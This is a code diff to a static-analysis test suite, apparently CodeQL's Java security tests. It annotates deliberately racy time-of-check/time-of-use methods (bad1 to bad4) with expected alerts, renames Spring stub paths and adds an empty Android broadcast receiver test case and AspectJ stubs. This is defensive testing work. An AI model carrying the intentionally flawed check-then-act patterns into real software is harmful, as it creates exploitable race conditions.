a/java/ql/test/query-tests/security/CWE-367/semmle/tests/TOCTOURace.qlref b/java/ql/test/query-tests/security/CWE-367/semmle/tests/TOCTOURace.qlref index 243a56419353..b278242dea6d 100644 --- a/java/ql/test/query-tests/security/CWE-367/semmle/tests/TOCTOURace.qlref +++ b/java/ql/test/query-tests/security/CWE-367/semmle/tests/TOCTOURace.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-367/TOCTOURace.ql \ No newline at end of file +query: Security/CWE/CWE-367/TOCTOURace.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/java/ql/test/query-tests/security/CWE-367/semmle/tests/Test.java b/java/ql/test/query-tests/security/CWE-367/semmle/tests/Test.java index c25a699001a6..11287896bbe4 100644 --- a/java/ql/test/query-tests/security/CWE-367/semmle/tests/Test.java +++ b/java/ql/test/query-tests/security/CWE-367/semmle/tests/Test.java @@ -4,27 +4,27 @@ class Test { public final Object lock = new Object(); - + public volatile boolean aField = true; - + public synchronized void bad1(Resource r) { // probably used concurrently due to synchronization if (r.getState()) { - r.act(); + r.act(); // $ Alert } } public synchronized void bad2(Resource2 r) { // probably used concurrently due to synchronization if (r.getState()) { - r.act(); + r.act(); // $ Alert } } public void bad3(Resource r) { // probably used concurrently due to use of volatile field if (r.getState() && aField) { - r.act(); + r.act(); // $ Alert } } @@ -32,11 +32,11 @@ public void bad4(Resource r) { // probably used concurrently due to synchronization synchronized(this) { if (r.getState() && aField) { - r.act(); + r.act(); // $ Alert } } } - + public void good1(Resource r) { // synchronizes on the same monitor as the called methods synchronized(r) { @@ -45,15 +45,15 @@ public void good1(Resource r) { } } } - + public Resource rField = new Resource(); - + public void someOtherMethod() { synchronized(lock) { rField.act(); } } - + public void good2() { // r is always guarded with the same lock, so okay synchronized(lock) { @@ -77,43 +77,43 @@ public void good3(Resource r) { r.act(); } } - + class Resource { boolean state; - + public synchronized void setState(boolean newState) { this.state = newState; } - + public synchronized boolean getState() { return state; } - + public synchronized void act() { if (state) sideEffect(); else sideEffect(); } - + public void sideEffect() { } } class Resource2 { boolean state; - + public void setState(boolean newState) { synchronized(this) { this.state = newState; } } - + public boolean getState() { synchronized(this) { return state; } } - + public void act() { synchronized(this) { if (state) @@ -122,7 +122,7 @@ public void act() { sideEffect(); } } - + public void sideEffect() { } } } diff --git a/java/ql/test/query-tests/security/CWE-502/options b/java/ql/test/query-tests/security/CWE-502/options index f15c0b925385..698b9bf8f1a3 100644 --- a/java/ql/test/query-tests/security/CWE-502/options +++ b/java/ql/test/query-tests/security/CWE-502/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../stubs/snakeyaml-1.21:${testdir}/../../../stubs/xstream-1.4.10:${testdir}/../../../stubs/kryo-4.0.2:${testdir}/../../../stubs/jsr311-api-1.1.1:${testdir}/../../../stubs/fastjson-1.2.74:${testdir}/../../../stubs/springframework-5.3.8:${testdir}/../../../stubs/servlet-api-2.4:${testdir}/../../../stubs/jyaml-1.3:${testdir}/../../../stubs/json-io-4.10.0:${testdir}/../../../stubs/yamlbeans-1.09:${testdir}/../../../stubs/hessian-4.0.38:${testdir}/../../../stubs/castor-1.4.1:${testdir}/../../../stubs/jackson-databind-2.12:${testdir}/../../../stubs/jackson-core-2.12:${testdir}/../../../stubs/jabsorb-1.3.2:${testdir}/../../../stubs/json-java-20210307:${testdir}/../../../stubs/joddjson-6.0.3:${testdir}/../../../stubs/flexjson-2.1:${testdir}/../../../stubs/gson-2.8.6:${testdir}/../../../stubs/google-android-9.0.0:${testdir}/../../../stubs/serialkiller-4.0.0:${testdir}/../../../stubs/jms-api-1 +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../stubs/snakeyaml-1.21:${testdir}/../../../stubs/xstream-1.4.10:${testdir}/../../../stubs/kryo-4.0.2:${testdir}/../../../stubs/jsr311-api-1.1.1:${testdir}/../../../stubs/fastjson-1.2.74:${testdir}/../../../stubs/springframework-5.8.x:${testdir}/../../../stubs/servlet-api-2.4:${testdir}/../../../stubs/jyaml-1.3:${testdir}/../../../stubs/json-io-4.10.0:${testdir}/../../../stubs/yamlbeans-1.09:${testdir}/../../../stubs/hessian-4.0.38:${testdir}/../../../stubs/castor-1.4.1:${testdir}/../../../stubs/jackson-databind-2.12:${testdir}/../../../stubs/jackson-core-2.12:${testdir}/../../../stubs/jabsorb-1.3.2:${testdir}/../../../stubs/json-java-20210307:${testdir}/../../../stubs/joddjson-6.0.3:${testdir}/../../../stubs/flexjson-2.1:${testdir}/../../../stubs/gson-2.8.6:${testdir}/../../../stubs/google-android-9.0.0:${testdir}/../../../stubs/serialkiller-4.0.0:${testdir}/../../../stubs/jms-api-1 diff --git a/java/ql/test/query-tests/security/CWE-552/options b/java/ql/test/query-tests/security/CWE-552/options index bda9516fb580..009d164e8fcf 100644 --- a/java/ql/test/query-tests/security/CWE-552/options +++ b/java/ql/test/query-tests/security/CWE-552/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../stubs/servlet-api-2.4:${testdir}/../../../stubs/springframework-5.3.8/:${testdir}/../../../stubs/javax-faces-2.3/:${testdir}/../../../stubs/undertow-io-2.2/:${testdir}/../../../stubs/jboss-vfs-3.2/:${testdir}/../../../stubs/stapler-1.263/:${testdir}/../../../stubs/apache-commons-fileupload-1.4/:${testdir}/../../../stubs/apache-commons-beanutils/:${testdir}/../../../stubs/saxon-xqj-9.x/:${testdir}/../../../stubs/apache-commons-lang/:${testdir}/../../../stubs/javax-servlet-2.5/ +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../stubs/servlet-api-2.4:${testdir}/../../../stubs/springframework-5.8.x/:${testdir}/../../../stubs/javax-faces-2.3/:${testdir}/../../../stubs/undertow-io-2.2/:${testdir}/../../../stubs/jboss-vfs-3.2/:${testdir}/../../../stubs/stapler-1.263/:${testdir}/../../../stubs/apache-commons-fileupload-1.4/:${testdir}/../../../stubs/apache-commons-beanutils/:${testdir}/../../../stubs/saxon-xqj-9.x/:${testdir}/../../../stubs/apache-commons-lang/:${testdir}/../../../stubs/javax-servlet-2.5/ diff --git a/java/ql/test/query-tests/security/CWE-611/options b/java/ql/test/query-tests/security/CWE-611/options index 145681fcb031..1480b49d7168 100644 --- a/java/ql/test/query-tests/security/CWE-611/options +++ b/java/ql/test/query-tests/security/CWE-611/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../stubs/jdom-1.1.3:${testdir}/../../../stubs/dom4j-2.1.1:${testdir}/../../../stubs/simple-xml-2.7.1:${testdir}/../../../stubs/jaxb-api-2.3.1:${testdir}/../../../stubs/jaxen-1.2.0:${testdir}/../../../stubs/apache-commons-digester3-3.2:${testdir}/../../../stubs/servlet-api-2.4/:${testdir}/../../../stubs/rundeck-api-java-client-13.2:${testdir}/../../../stubs/springframework-5.3.8/:${testdir}/../../../stubs/mdht-1.2.0/ +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../stubs/jdom-1.1.3:${testdir}/../../../stubs/dom4j-2.1.1:${testdir}/../../../stubs/simple-xml-2.7.1:${testdir}/../../../stubs/jaxb-api-2.3.1:${testdir}/../../../stubs/jaxen-1.2.0:${testdir}/../../../stubs/apache-commons-digester3-3.2:${testdir}/../../../stubs/servlet-api-2.4/:${testdir}/../../../stubs/rundeck-api-java-client-13.2:${testdir}/../../../stubs/springframework-5.8.x/:${testdir}/../../../stubs/mdht-1.2.0/ diff --git a/java/ql/test/query-tests/security/CWE-917/options b/java/ql/test/query-tests/security/CWE-917/options index cfb77dafac33..35f135b5f1bf 100644 --- a/java/ql/test/query-tests/security/CWE-917/options +++ b/java/ql/test/query-tests/security/CWE-917/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../stubs/springframework-5.3.8:${testdir}/../../../stubs/ognl-3.2.14:${testdir}/../../../stubs/struts2-core-2.5.22 +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../stubs/springframework-5.8.x:${testdir}/../../../stubs/ognl-3.2.14:${testdir}/../../../stubs/struts2-core-2.5.22 diff --git a/java/ql/test/query-tests/security/CWE-918/options b/java/ql/test/query-tests/security/CWE-918/options index 4158843ef980..78a6c15024ae 100644 --- a/java/ql/test/query-tests/security/CWE-918/options +++ b/java/ql/test/query-tests/security/CWE-918/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -source 11 -target 11 -cp ${testdir}/../../../stubs/springframework-5.3.8:${testdir}/../../../stubs/javax-ws-rs-api-2.1.1:${testdir}/../../../stubs/javax-ws-rs-api-3.0.0:${testdir}/../../../stubs/apache-http-4.4.13/:${testdir}/../../../stubs/projectreactor-3.4.3/:${testdir}/../../../stubs/postgresql-42.3.3/:${testdir}/../../../stubs/HikariCP-3.4.5/:${testdir}/../../../stubs/spring-jdbc-5.3.8/:${testdir}/../../../stubs/jdbi3-core-3.27.2/:${testdir}/../../../stubs/cargo:${testdir}/../../../stubs/javafx-web:${testdir}/../../../stubs/apache-commons-jelly-1.0.1:${testdir}/../../../stubs/dom4j-2.1.1:${testdir}/../../../stubs/jaxen-1.2.0:${testdir}/../../../stubs/stapler-1.263:${testdir}/../../../stubs/javax-servlet-2.5:${testdir}/../../../stubs/apache-commons-fileupload-1.4:${testdir}/../../../stubs/saxon-xqj-9.x:${testdir}/../../../stubs/apache-commons-beanutils:${testdir}/../../../stubs/apache-commons-lang:${testdir}/../../../stubs/apache-http-5:${testdir}/../../../stubs/playframework-2.6.x:${testdir}/../../../stubs/jaxws-api-2.0:${testdir}/../../../stubs/apache-cxf +//semmle-extractor-options: --javac-args -source 11 -target 11 -cp ${testdir}/../../../stubs/springframework-5.8.x:${testdir}/../../../stubs/javax-ws-rs-api-2.1.1:${testdir}/../../../stubs/javax-ws-rs-api-3.0.0:${testdir}/../../../stubs/apache-http-4.4.13/:${testdir}/../../../stubs/projectreactor-3.4.3/:${testdir}/../../../stubs/postgresql-42.3.3/:${testdir}/../../../stubs/HikariCP-3.4.5/:${testdir}/../../../stubs/spring-jdbc-5.3.8/:${testdir}/../../../stubs/jdbi3-core-3.27.2/:${testdir}/../../../stubs/cargo:${testdir}/../../../stubs/javafx-web:${testdir}/../../../stubs/apache-commons-jelly-1.0.1:${testdir}/../../../stubs/dom4j-2.1.1:${testdir}/../../../stubs/jaxen-1.2.0:${testdir}/../../../stubs/stapler-1.263:${testdir}/../../../stubs/javax-servlet-2.5:${testdir}/../../../stubs/apache-commons-fileupload-1.4:${testdir}/../../../stubs/saxon-xqj-9.x:${testdir}/../../../stubs/apache-commons-beanutils:${testdir}/../../../stubs/apache-commons-lang:${testdir}/../../../stubs/apache-http-5:${testdir}/../../../stubs/playframework-2.6.x:${testdir}/../../../stubs/jaxws-api-2.0:${testdir}/../../../stubs/apache-cxf diff --git a/java/ql/test/query-tests/security/CWE-925/AndroidManifest.xml b/java/ql/test/query-tests/security/CWE-925/AndroidManifest.xml index f9e11a1ee812..5fd3986f82c2 100644 --- a/java/ql/test/query-tests/security/CWE-925/AndroidManifest.xml +++ b/java/ql/test/query-tests/security/CWE-925/AndroidManifest.xml @@ -5,5 +5,10 @@ + + + + + - \ No newline at end of file + diff --git a/java/ql/test/query-tests/security/CWE-925/EmptyReceiverXml.java b/java/ql/test/query-tests/security/CWE-925/EmptyReceiverXml.java new file mode 100644 index 000000000000..44a81db62302 --- /dev/null +++ b/java/ql/test/query-tests/security/CWE-925/EmptyReceiverXml.java @@ -0,0 +1,9 @@ +package test; +import android.content.Intent; +import android.content.Context; +import android.content.BroadcastReceiver; + +class EmptyReceiverXml extends BroadcastReceiver { + @Override + public void onReceive(Context ctx, Intent intent) { } +} diff --git a/java/ql/test/stubs/aspectj/LICENSE.txt b/java/ql/test/stubs/aspectj/LICENSE.txt new file mode 100644 index 000000000000..384e2af26f7e --- /dev/null +++ b/java/ql/test/stubs/aspectj/LICENSE.txt @@ -0,0 +1,279 @@ +Per: https://www.eclipse.org/org/documents/epl-2.0/EPL-2.0.txt + +Eclipse Public License - v 2.0 + + THE ACCOMPANYING PROGRAM IS PROVIDED UNDER THE TERMS OF THIS ECLIPSE + PUBLIC LICENSE ("AGREEMENT"). ANY USE, REPRODUCTION OR DISTRIBUTION + OF THE PROGRAM CONSTITUTES RECIPIENT'S ACCEPTANCE OF THIS AGREEMENT. + +1. DEFINITIONS + +"Contribution" means: + + a) in the case of the initial Contributor, the initial content + Distributed under this Agreement, and + + b) in the case of each subsequent Contributor: + i) changes to the Program, and + ii) additions to the Program; + where such changes and/or additions to the Program originate from + and are Distributed by that particular Contributor. A Contribution + "originates" from a Contributor if it was added to the Program by + such Contributor itself or anyone acting on such Contributor's behalf. + Contributions do not include changes or additions to the Program that + are not Modified Works. + +"Contributor" means any person or entity that Distributes the Program. + +"Licensed Patents" mean patent claims licensable by a Contributor which +are necessarily infringed by the use or sale of its Contribution alone +or when combined with the Program. + +"Program" means the Contributions Distributed in accordance with this +Agreement. + +"Recipient" means anyone who receives the Program under this Agreement +or any Secondary License (as applicable), including Contributors. + +"Derivative Works" shall mean any work, whether in Source Code or other +form, that is based on (or derived from) the Program and for which the +editorial revisions, annotations, elaborations, or other modifications +represent, as a whole, an original work of authorship. + +"Modified Works" shall mean any work in Source Code or other form that +results from an addition to, deletion from, or modification of the +contents of the Program, including, for purposes of clarity any new file +in Source Code form that contains any contents of the Program. Modified +Works shall not include works that contain only declarations, +interfaces, types, classes, structures, or files of the Program solely +in each case in order to link to, bind by name, or subclass the Program +or Modified Works thereof. + +"Distribute" means the acts of a) distributing or b) making available +in any manner that enables the transfer of a copy. + +"Source Code" means the form of a Program preferred for making +modifications, including but not limited to software source code, +documentation source, and configuration files. + +"Secondary License" means either the GNU General Public License, +Version 2.0, or any later versions of that license, including any +exceptions or additional permissions as identified by the initial +Contributor. + +2. GRANT OF RIGHTS + + a) Subject to the terms of this Agreement, each Contributor hereby + grants Recipient a non-exclusive, worldwide, royalty-free copyright + license to reproduce, prepare Derivative Works of, publicly display, + publicly perform, Distribute and sublicense the Contribution of such + Contributor, if any, and such Derivative Works. + + b) Subject to the terms of this Agreement, each Contributor hereby + grants Recipient a non-exclusive, worldwide, royalty-free patent + license under Licensed Patents to make, use, sell, offer to sell, + import and otherwise transfer the Contribution of such Contributor, + if any, in Source Code or other form. This patent license shall + apply to the combination of the Contribution and the Program if, at + the time the Contribution is added by the Contributor, such addition + of the Contribution causes such combination to be covered by the + Licensed Patents. The patent license shall not apply to any other + combinations which include the Contribution. No hardware per se is + licensed hereunder. + + c) Recipient understands that although each Contributor grants the + licenses to its Contributions set forth herein, no assurances are + provided by any Contributor that the Program does not infringe the + patent or other intellectual property rights of any other entity. + Each Contributor disclaims any liability to Recipient for claims + brought by any other entity based on infringement of intellectual + property rights or otherwise. As a condition to exercising the + rights and licenses granted hereunder, each Recipient hereby + assumes sole responsibility to secure any other intellectual + property rights needed, if any. For example, if a third party + patent license is required to allow Recipient to Distribute the + Program, it is Recipient's responsibility to acquire that license + before distributing the Program. + + d) Each Contributor represents that to its knowledge it has + sufficient copyright rights in its Contribution, if any, to grant + the copyright license set forth in this Agreement. + + e) Notwithstanding the terms of any Secondary License, no + Contributor makes additional grants to any Recipient (other than + those set forth in this Agreement) as a result of such Recipient's + receipt of the Program under the terms of a Secondary License + (if permitted under the terms of Section 3). + +3. REQUIREMENTS + +3.1 If a Contributor Distributes the Program in any form, then: + + a) the Program must also be made available as Source Code, in + accordance with section 3.2, and the Contributor must accompany + the Program with a statement that the Source Code for the Program + is available under this Agreement, and informs Recipients how to + obtain it in a reasonable manner on or through a medium customarily + used for software exchange; and + + b) the Contributor may Distribute the Program under a license + different than this Agreement, provided that such license: + i) effectively disclaims on behalf of all other Contributors all + warranties and conditions, express and implied, including + warranties or conditions of title and non-infringement, and + implied warranties or conditions of merchantability and fitness + for a particular purpose; + + ii) effectively excludes on behalf of all other Contributors all + liability for damages, including direct, indirect, special, + incidental and consequential damages, such as lost profits; + + iii) does not attempt to limit or alter the recipients' rights + in the Source Code under section 3.2; and + + iv) requires any subsequent distribution of the Program by any + party to be under a license that satisfies the requirements + of this section 3. + +3.2 When the Program is Distributed as Source Code: + + a) it must be made available under this Agreement, or if the + Program (i) is combined with other material in a separate file or + files made available under a Secondary License, and (ii) the initial + Contributor attached to the Source Code the notice described in + Exhibit A of this Agreement, then the Program may be made available + under the terms of such Secondary Licenses, and + + b) a copy of this Agreement must be included with each copy of + the Program. + +3.3 Contributors may not remove or alter any copyright, patent, +trademark, attribution notices, disclaimers of warranty, or limitations +of liability ("notices") contained within the Program from any copy of +the Program which they Distribute, provided that Contributors may add +their own appropriate notices. + +4. COMMERCIAL DISTRIBUTION + +Commercial distributors of software may accept certain responsibilities +with respect to end users, business partners and the like. While this +license is intended to facilitate the commercial use of the Program, +the Contributor who includes the Program in a commercial product +offering should do so in a manner which does not create potential +liability for other Contributors. Therefore, if a Contributor includes +the Program in a commercial product offering, such Contributor +("Commercial Contributor") hereby agrees to defend and indemnify every +other Contributor ("Indemnified Contributor") against any losses, +damages and costs (collectively "Losses") arising from claims, lawsuits +and other legal actions brought by a third party against the Indemnified +Contributor to the extent caused by the acts or omissions of such +Commercial Contributor in connection with its distribution of the Program +in a commercial product offering. The obligations in this section do not +apply to any claims or Losses relating to any actual or alleged +intellectual property infringement. In order to qualify, an Indemnified +Contributor must: a) promptly notify the Commercial Contributor in +writing of such claim, and b) allow the Commercial Contributor to control, +and cooperate with the Commercial Contributor in, the defense and any +related settlement negotiations. The Indemnified Contributor may +participate in any such claim at its own expense. + +For example, a Contributor might include the Program in a commercial +product offering, Product X. That Contributor is then a Commercial +Contributor. If that Commercial Contributor then makes performance +claims, or offers warranties related to Product X, those performance +claims and warranties are such Commercial Contributor's responsibility +alone. Under this section, the Commercial Contributor would have to +defend claims against the other Contributors related to those performance +claims and warranties, and if a court requires any other Contributor to +pay any damages as a result, the Commercial Contributor must pay +those damages. + +5. NO WARRANTY + +EXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, AND TO THE EXTENT +PERMITTED BY APPLICABLE LAW, THE PROGRAM IS PROVIDED ON AN "AS IS" +BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, EITHER EXPRESS OR +IMPLIED INCLUDING, WITHOUT LIMITATION, ANY WARRANTIES OR CONDITIONS OF +TITLE, NON-INFRINGEMENT, MERCHANTABILITY OR FITNESS FOR A PARTICULAR +PURPOSE. Each Recipient is solely responsible for determining the +appropriateness of using and distributing the Program and assumes all +risks associated with its exercise of rights under this Agreement, +including but not limited to the risks and costs of program errors, +compliance with applicable laws, damage to or loss of data, programs +or equipment, and unavailability or interruption of operations. + +6. DISCLAIMER OF LIABILITY + +EXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, AND TO THE EXTENT +PERMITTED BY APPLICABLE LAW, NEITHER RECIPIENT NOR ANY CONTRIBUTORS +SHALL HAVE ANY LIABILITY FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, +EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING WITHOUT LIMITATION LOST +PROFITS), HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +ARISING IN ANY WAY OUT OF THE USE OR DISTRIBUTION OF THE PROGRAM OR THE +EXERCISE OF ANY RIGHTS GRANTED HEREUNDER, EVEN IF ADVISED OF THE +POSSIBILITY OF SUCH DAMAGES. + +7. GENERAL + +If any provision of this Agreement is invalid or unenforceable under +applicable law, it shall not affect the validity or enforceability of +the remainder of the terms of this Agreement, and without further +action by the parties hereto, such provision shall be reformed to the +minimum extent necessary to make such provision valid and enforceable. + +If Recipient institutes patent litigation against any entity +(including a cross-claim or counterclaim in a lawsuit) alleging that the +Program itself (excluding combinations of the Program with other software +or hardware) infringes such Recipient's patent(s), then such Recipient's +rights granted under Section 2(b) shall terminate as of the date such +litigation is filed. + +All Recipient's rights under this Agreement shall terminate if it +fails to comply with any of the material terms or conditions of this +Agreement and does not cure such failure in a reasonable period of +time after becoming aware of such noncompliance. If all Recipient's +rights under this Agreement terminate, Recipient agrees to cease use +and distribution of the Program as soon as reasonably practicable. +However, Recipient's obligations under this Agreement and any licenses +granted by Recipient relating to the Program shall continue and survive. + +Everyone is permitted to copy and distribute copies of this Agreement, +but in order to avoid inconsistency the Agreement is copyrighted and +may only be modified in the following manner. The Agreement Steward +reserves the right to publish new versions (including revisions) of +this Agreement from time to time. No one other than the Agreement +Steward has the right to modify this Agreement. The Eclipse Foundation +is the initial Agreement Steward. The Eclipse Foundation may assign the +responsibility to serve as the Agreement Steward to a suitable separate +entity. Each new version of the Agreement will be given a distinguishing +version number. The Program (including Contributions) may always be +Distributed subject to the version of the Agreement under which it was +received. In addition, after a new version of the Agreement is published, +Contributor may elect to Distribute the Program (including its +Contributions) under the new version. + +Except as expressly stated in Sections 2(a) and 2(b) above, Recipient +receives no rights or licenses to the intellectual property of any +Contributor under this Agreement, whether expressly, by implication, +estoppel or otherwise. All rights in the Program not expressly granted +under this Agreement are reserved. Nothing in this Agreement is intended +to be enforceable by any entity that is not a Contributor or Recipient. +No third-party beneficiary rights are created under this Agreement. + +Exhibit A - Form of Secondary Licenses Notice + +"This Source Code may also be made available under the following +Secondary Licenses when the conditions for such availability set forth +in the Eclipse Public License, v. 2.0 are satisfied: {name license(s), +version(s), and exceptions or additional permissions here}." + + Simply including a copy of this Agreement, including this Exhibit A + is not sufficient to license the Source Code under Secondary Licenses. + + If it is not possible or desirable to put the notice in a particular + file, then You may include the notice in a location (such as a LICENSE + file in a relevant directory) where a recipient would be likely to + look for such a notice. + + You may add additional accurate notices of copyright ownership. \ No newline at end of file diff --git a/java/ql/test/stubs/aspectj/org/aspectj/lang/annotation/Pointcut.java b/java/ql/test/stubs/aspectj/org/aspectj/lang/annotation/Pointcut.java new file mode 100644 index 000000000000..8afcd092ce5b --- /dev/null +++ b/java/ql/test/stubs/aspectj/org/aspectj/lang/annotation/Pointcut.java @@ -0,0 +1,27 @@ +/******************************************************************************* + * Copyright (c) 2005 Contributors. + * All rights reserved. + * This program and the accompanying materials are made available + * under the terms of the Eclipse Public License v 2.0 + * which accompanies this distribution and is available at + * https://www.eclipse.org/org/documents/epl-2.0/EPL-2.0.txt + * + * Contributors: + * initial implementation Alexandre Vasseur + *******************************************************************************/ +package org.aspectj.lang.annotation; + +import java.lang.annotation.Target; +import java.lang.annotation.ElementType; +import java.lang.annotation.Retention; +import java.lang.annotation.RetentionPolicy; + +/** + * Pointcut declaration + * + * @author Alexandre Vasseur + */ +@Retention(RetentionPolicy.RUNTIME) +@Target(ElementType.METHOD) +public @interface Pointcut {} + diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/builders/HttpSecurity.java b/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/builders/HttpSecurity.java deleted file mode 100644 index 3dbe33cdeb9c..000000000000 --- a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/builders/HttpSecurity.java +++ /dev/null @@ -1,53 +0,0 @@ -package org.springframework.security.config.annotation.web.builders; - -import org.springframework.security.config.annotation.AbstractConfiguredSecurityBuilder; -import org.springframework.security.config.annotation.SecurityBuilder; -import org.springframework.security.config.annotation.web.HttpSecurityBuilder; -import org.springframework.security.config.annotation.web.builders.HttpSecurity.RequestMatcherConfigurer; -import org.springframework.security.web.DefaultSecurityFilterChain; -import org.springframework.security.web.util.matcher.RequestMatcher; -import org.springframework.security.config.Customizer; -import org.springframework.security.config.annotation.web.configurers.CsrfConfigurer; -import org.springframework.security.config.annotation.web.configurers.ExpressionUrlAuthorizationConfigurer; -import org.springframework.security.config.annotation.web.AbstractRequestMatcherRegistry; - -public final class HttpSecurity extends AbstractConfiguredSecurityBuilder - implements SecurityBuilder, HttpSecurityBuilder { - - public HttpSecurity requestMatcher(RequestMatcher requestMatcher) { - return this; - } - - public HttpSecurity authorizeRequests( - Customizer.ExpressionInterceptUrlRegistry> authorizeRequestsCustomizer) - throws Exception { - return this; - } - - public ExpressionUrlAuthorizationConfigurer.ExpressionInterceptUrlRegistry authorizeRequests() - throws Exception { - return null; - } - - public HttpSecurity requestMatchers(Customizer requestMatcherCustomizer) { - return this; - } - - public RequestMatcherConfigurer requestMatchers() { - return null; - } - - public CsrfConfigurer csrf() { - return null; - } - - public HttpSecurity csrf(Customizer> csrfCustomizer) { - return null; - } - - public final class MvcMatchersRequestMatcherConfigurer extends RequestMatcherConfigurer { - } - - public class RequestMatcherConfigurer extends AbstractRequestMatcherRegistry { - } -} diff --git a/java/ql/test/stubs/springframework-5.3.8/LICENSE.txt b/java/ql/test/stubs/springframework-5.8.x/LICENSE.txt similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/LICENSE.txt rename to java/ql/test/stubs/springframework-5.8.x/LICENSE.txt diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/BeansException.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/BeansException.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/BeansException.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/BeansException.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/FatalBeanException.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/FatalBeanException.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/FatalBeanException.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/FatalBeanException.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/MutablePropertyValues.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/MutablePropertyValues.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/MutablePropertyValues.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/MutablePropertyValues.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/PropertyValue.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/PropertyValue.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/PropertyValue.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/PropertyValue.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/PropertyValues.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/PropertyValues.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/PropertyValues.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/PropertyValues.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/factory/Aware.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/factory/Aware.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/factory/Aware.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/factory/Aware.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/factory/BeanClassLoaderAware.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/factory/BeanClassLoaderAware.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/factory/BeanClassLoaderAware.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/factory/BeanClassLoaderAware.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/factory/BeanDefinitionStoreException.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/factory/BeanDefinitionStoreException.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/factory/BeanDefinitionStoreException.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/factory/BeanDefinitionStoreException.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/factory/BeanFactory.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/factory/BeanFactory.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/factory/BeanFactory.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/factory/BeanFactory.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/factory/HierarchicalBeanFactory.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/factory/HierarchicalBeanFactory.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/factory/HierarchicalBeanFactory.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/factory/HierarchicalBeanFactory.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/factory/InitializingBean.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/factory/InitializingBean.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/factory/InitializingBean.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/factory/InitializingBean.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/factory/ListableBeanFactory.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/factory/ListableBeanFactory.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/factory/ListableBeanFactory.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/factory/ListableBeanFactory.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/factory/NoSuchBeanDefinitionException.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/factory/NoSuchBeanDefinitionException.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/factory/NoSuchBeanDefinitionException.java rename to 